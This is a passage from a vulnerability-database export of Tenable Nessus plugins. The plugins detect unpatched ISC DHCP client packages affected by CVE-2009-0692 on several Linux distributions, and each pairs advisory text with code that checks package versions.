"2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:dhclient", "p-cpe:/a:oracle:linux:dhcp", "p-cpe:/a:oracle:linux:dhcp-devel", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2009-1136.NASL", "href": "https://www.tenable.com/plugins/nessus/67886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:1136 and \n# Oracle Linux Security Advisory ELSA-2009-1136 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67886);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_bugtraq_id(35668);\n script_xref(name:\"RHSA\", value:\"2009:1136\");\n\n script_name(english:\"Oracle Linux 4 : dhcp (ELSA-2009-1136)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:1136 :\n\nUpdated dhcp packages that fix a security issue are now available for\nRed Hat Enterprise Linux 4 and 4.7 Extended Update Support.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to\nreceive a malicious DHCP response, it could crash or execute arbitrary\ncode with the permissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain\na backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-July/001075.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"dhclient-3.0.1-65.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"dhcp-3.0.1-65.el4_8.1\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"dhcp-devel-3.0.1-65.el4_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-devel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T16:17:58", "description": "USN-803-1 fixed a vulnerability in Dhcp. Due to an error, the patch to fix the vulnerability was not properly applied on Ubuntu 8.10 and higher. Even with the patch improperly applied, the default compiler options reduced the vulnerability to a denial of service.\nAdditionally, in Ubuntu 9.04 and higher, users were also protected by the AppArmor dhclient3 profile. This update fixes the problem.\n\nIt was discovered that the DHCP client as included in dhcp3 did not verify the length of certain option fields when processing a response from an IPv4 dhcp server. If a user running Ubuntu 6.06 LTS or 8.04 LTS connected to a malicious dhcp server, a remote attacker could cause a denial of service or execute arbitrary code as the user invoking the program, typically the 'dhcp' user. For users running Ubuntu 8.10 or 9.04, a remote attacker should only be able to cause a denial of service in the DHCP client. In Ubuntu 9.04, attackers would also be isolated by the AppArmor dhclient3 profile.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2010-01-28T00:00:00", "type": "nessus", "title": "Ubuntu 8.10 / 9.04 / 9.10 : dhcp3 vulnerability (USN-803-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2019-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:dhcp-client", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-client", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-client-udeb", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-common", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-dev", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-relay", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-server", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-server-ldap", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04", "cpe:/o:canonical:ubuntu_linux:9.10"], "id": "UBUNTU_USN-803-2.NASL", "href": "https://www.tenable.com/plugins/nessus/44326", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-803-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44326);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/01/02 16:37:56\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_bugtraq_id(35668);\n script_xref(name:\"USN\", value:\"803-2\");\n\n script_name(english:\"Ubuntu 8.10 / 9.04 / 9.10 : dhcp3 vulnerability (USN-803-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-803-1 fixed a vulnerability in Dhcp. Due to an error, the patch to\nfix the vulnerability was not properly applied on Ubuntu 8.10 and\nhigher. Even with the patch improperly applied, the default compiler\noptions reduced the vulnerability to a denial of service.\nAdditionally, in Ubuntu 9.04 and higher, users were also protected by\nthe AppArmor dhclient3 profile. This update fixes the problem.\n\nIt was discovered that the DHCP client as included in dhcp3 did not\nverify the length of certain option fields when processing a response\nfrom an IPv4 dhcp server. If a user running Ubuntu 6.06 LTS or 8.04\nLTS connected to a malicious dhcp server, a remote attacker could\ncause a denial of service or execute arbitrary code as the user\ninvoking the program, typically the 'dhcp' user. For users running\nUbuntu 8.10 or 9.04, a remote attacker should only be able to cause a\ndenial of service in the DHCP client. In Ubuntu 9.04, attackers would\nalso be isolated by the AppArmor dhclient3 profile.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/803-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-client-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-server-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.10|9\\.04|9\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.10 / 9.04 / 9.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-client\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-client-udeb\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-common\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-dev\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-relay\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-server\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-server-ldap\", pkgver:\"3.1.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp-client\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-client\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-common\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-dev\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-relay\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-server\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-server-ldap\", pkgver:\"3.1.1-5ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp-client\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp3-client\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp3-common\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp3-dev\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp3-relay\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp3-server\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"dhcp3-server-ldap\", pkgver:\"3.1.2-1ubuntu7.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhcp-client / dhcp3-client / dhcp3-client-udeb / dhcp3-common / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:52:38", "description": "The remote host is affected by the vulnerability described in GLSA-200907-12 (ISC DHCP: dhcpclient Remote execution of arbitrary code)\n\n The Mandriva Linux Engineering Team has reported a stack-based buffer overflow in the subnet-mask handling of dhclient.\n Impact :\n\n A remote attacker might set up a rogue DHCP server in a victim's local network, possibly leading to the execution of arbitrary code with root privileges.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2009-07-15T00:00:00", "type": "nessus", "title": "GLSA-200907-12 : ISC DHCP: dhcpclient Remote execution of arbitrary code", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:dhcp", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200907-12.NASL", "href": "https://www.tenable.com/plugins/nessus/39797", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200907-12.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39797);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_xref(name:\"GLSA\", value:\"200907-12\");\n\n script_name(english:\"GLSA-200907-12 : ISC DHCP: dhcpclient Remote execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200907-12\n(ISC DHCP: dhcpclient Remote execution of arbitrary code)\n\n The Mandriva Linux Engineering Team has reported a stack-based buffer\n overflow in the subnet-mask handling of dhclient.\n \nImpact :\n\n A remote attacker might set up a rogue DHCP server in a victim's local\n network, possibly leading to the execution of arbitrary code with root\n privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200907-12\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All ISC DHCP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/dhcp-3.1.1-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/dhcp\", unaffected:make_list(\"ge 3.1.1-r1\"), vulnerable:make_list(\"lt 3.1.1-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ISC DHCP\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:52:42", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might is likely caught by the buffer overflow checking of the FORTIFY_SOURCE extension.", "cvss3": {}, "published": "2009-07-21T00:00:00", "type": "nessus", "title": "openSUSE Security Update : dhcp (dhcp-1067)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:dhcp", "p-cpe:/a:novell:opensuse:dhcp-client", "p-cpe:/a:novell:opensuse:dhcp-devel", "p-cpe:/a:novell:opensuse:dhcp-relay", "p-cpe:/a:novell:opensuse:dhcp-server", "cpe:/o:novell:opensuse:11.0"], "id": "SUSE_11_0_DHCP-090626.NASL", "href": "https://www.tenable.com/plugins/nessus/39950", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dhcp-1067.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39950);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0692\");\n\n script_name(english:\"openSUSE Security Update : dhcp (dhcp-1067)\");\n script_summary(english:\"Check for the dhcp-1067 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The DHCP client (dhclient) could be crashed by a malicious DHCP server\nsending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might is\nlikely caught by the buffer overflow checking of the FORTIFY_SOURCE\nextension.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=515599\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dhcp-3.0.6-86.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dhcp-client-3.0.6-86.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dhcp-devel-3.0.6-86.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dhcp-relay-3.0.6-86.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"dhcp-server-3.0.6-86.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhcp-client\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-06T15:07:19", "description": "New dhcp packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2, 11.0, 12.0, 12.1, 12.2, and -current to fix a security issue with dhclient. Note that dhclient is not the default DHCP client in Slackware's networking scripts, dhcpcd is. However, if you use dhclient on a network where someone could deploy a hostile DHCP server, you should upgrade to the new package.", "cvss3": {}, "published": "2009-07-15T00:00:00", "type": "nessus", "title": "Slackware 10.0 / 10.1 / 10.2 / 11.0 / 12.0 / 12.1 / 12.2 / 8.1 / 9.0 / 9.1 / current : dhcp (SSA:2009-195-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:dhcp", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux:10.1", "cpe:/o:slackware:slackware_linux:10.2", "cpe:/o:slackware:slackware_linux:11.0", "cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:12.1", "cpe:/o:slackware:slackware_linux:12.2", "cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1"], "id": "SLACKWARE_SSA_2009-195-01.NASL", "href": "https://www.tenable.com/plugins/nessus/39796", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2009-195-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39796);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_bugtraq_id(35668);\n script_xref(name:\"SSA\", value:\"2009-195-01\");\n\n script_name(english:\"Slackware 10.0 / 10.1 / 10.2 / 11.0 / 12.0 / 12.1 / 12.2 / 8.1 / 9.0 / 9.1 / current : dhcp (SSA:2009-195-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New dhcp packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, 11.0, 12.0, 12.1, 12.2, and -current to fix a security\nissue with dhclient. Note that dhclient is not the default DHCP client\nin Slackware's networking scripts, dhcpcd is. However, if you use\ndhclient on a network where someone could deploy a hostile DHCP\nserver, you should upgrade to the new package.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.561471\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fe04b694\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", 